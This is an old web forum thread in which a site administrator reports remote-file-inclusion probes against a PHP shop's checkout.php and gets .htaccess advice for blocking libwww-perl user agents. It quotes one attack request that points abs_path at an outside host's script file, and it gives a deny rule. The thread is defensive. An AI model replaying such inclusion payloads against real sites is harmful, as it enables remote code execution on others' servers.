Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x
Author Message
dad7732
RavenNuke(tm) Development Team


Joined: Mar 18, 2007
Posts: 1242

PostPosted: Tue Aug 07, 2007 9:35 am Reply with quote

Been running Sentinel for a long time so I have to ask ... Is there some sort of Sentinel type protection application for a regular PHP type site, not Nuke?

I have a customer where we're running a site written in plain old PHP. The site uses Sunshop for ordering and there are several blank orders coming through. Looking at the logs there are several lines using the /checkout.php/ for example:
Code:
"GET /shop/checkout.php?abs_path=http://www.italiandirectory.com/cache/echo.txt? HTTP/1.1" 200 23661 "-" "libwww-perl/5.807"


I can't figure out the attempted exploit as there is nothing intrusive happening that I can see.

Posting this here as you guys have been VERY helpful with previous issues, etc.

Thanks, Jay
 
View user's profile Send private message
Captain_Computer
Hangin' Around


Joined: May 30, 2004
Posts: 46

PostPosted: Tue Aug 07, 2007 10:06 am Reply with quote

Do a search on the forums for:
Code:


libwww-perl

There are numerous posts indicating how to stop those type of attacks using your (dot)htaccess file.

As for having Sentinel type program working with other than Nuke sites, there isn't anything published. But I have managed to get Sentinel working with Subdreamer CMS and IPB forums on my local machine.

_________________
Captain Computer Said It !!!! 
View user's profile Send private message Visit poster's website
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Tue Aug 07, 2007 11:10 am Reply with quote

They are probably just wildy throwing things at your scripts, not knowing what type of software you have. That attack may be meant for another CMS for example.

Their user agent means they are using a Perl script to access your site, not a browser. The user agent can easily be spoofed however. You can use .htaccess to block those user agents, as discussed in other threads.

As far as using Sentinel on a non-Nuke PHP site, you could probably get it to work, but I would just ensure you are propertly sanitizing all inputs. And turn register_globals off.

_________________
Only registered users can see links on this board! Get registered or login! - An Event Calendar for PHP-Nuke
Only registered users can see links on this board! Get registered or login! - A Google Maps Nuke Module 
View user's profile Send private message
dad7732
PostPosted: Tue Aug 07, 2007 11:26 am Reply with quote

Didn't think about the .htaccess but that makes sense, thanks for jogging the memory. The script seems to be innocuous but it's rather annoying to the customer because every time they try, it causes a blank order to be generated.

register_globals has to be ON for the time being, other sites need it on.

Will report back with success .. thanks all.
 
dad7732
PostPosted: Tue Aug 07, 2007 12:03 pm Reply with quote

This one in the .htaccess file did the trick. Error_log loaded with "Denied by server configuration" in the last 1/2 hr.

SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

Thanks to all ..... Jay
 
Gremmie
PostPosted: Tue Aug 07, 2007 6:12 pm Reply with quote

Rockin'!
 
Captain_Computer
PostPosted: Tue Aug 07, 2007 8:47 pm Reply with quote

Your welcome. It is really refreshing that after a problem is solved that the person comes back and thanks the community.
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©